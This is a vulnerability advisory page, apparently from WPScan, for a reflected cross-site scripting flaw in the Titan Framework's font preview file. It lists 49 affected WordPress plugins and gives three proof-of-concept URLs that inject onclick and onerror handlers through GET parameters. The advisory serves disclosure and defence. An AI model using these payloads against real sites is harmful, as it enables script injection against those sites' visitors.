logo
DATABASE RESOURCES PRICING ABOUT US

Titan Framework <= 1.12.1 - Reflected Cross-Site Scripting (XSS)

Description

The iframe-font-preview.php file of the titan-framework does not properly escape the font-weight and font-family GET parameters before outputting them back in an href attribute, leading to Reflected Cross-Site Scripting issues Edit (WPScanTeam): \- The original report mentioned the issue in the awesome-support plugin 6.0.1, however we scanned to WordPress plugins repository for such library being used and 49 plugins were found to be affected. \- The titan-framework has been permanently closed as no longer updated and maintained \- The full report, including all the affected plugins, was shared with WP plugins team on March 28th, 2021 and they gave vendors 3 months to find a replacement ### PoC Original reporter: /wp-content/plugins/awesome-support/vendor/gambitph/titan-framework/lib/iframe-font-preview.php?font-type=google&font-family;=aaaaa&font-weight;=%27%20accesskey=%27x%27%20onclick=%27alert(1)%27%20class=%27 WPScanTeam: /lib/iframe-font-preview.php?font-type=google&font-family;=aaaaa&font-weight;=%27%20onerror=alert(/XSS/)%20b=%27 /lib/iframe-font-preview.php?font-type=google&font-family;=%27/onerror=%27alert(/XSS/)%27/b=%27


Affected Software


CPE Name Name Version
4k-icon-fonts-for-visual-composer *
adblock-notify-by-bweb *
affiliate-pro *
amp-extensions *
aoi-tori *
awesome-support *
betteroptin *
border-loading-bar *
catchers-helpdesk *
categories-gallery *
categories-gallery-woocommerce *
cf7-customizer *
clinicalwp-core *
cool-facebook-page-feed-timeline *
custom-scroll-bar-designer *
custom-text-selection-colors *
disable-image-right-click *
easy-gallery-slideshow *
easy-google-map *
easy-justified-gallery *
email-my-posts *
exit-popup-show *
flight-search-widget-blocks *
icons-with-links-widget *
icustomizer 1.5.0
live-chat-facebook-fanpage *
media-mirror *
mobile-menu 2.8.2.3
popup-modal-for-youtube *
project-app *
seatgeek-affiliate-tickets *
seo-dashboard-by-gutewebsites-de *
share-woocommerce-email *
simple-behace-portfolio *
stars-menu *
station-pro 2.2.2
sticky-related-posts *
tcs3 *
template-events-calendar 1.7.2
titan-framework *
total-sales-for-woocommerce *
tr-easy-google-analytics *
venture-event-manager 3.2.5
w3s-cf7-zoho 2.1.0
webhotelier *
woo-availability-date *
woo-whatsapp-request-quote *
woosaleskit-bar *
yandex-money-button *

Related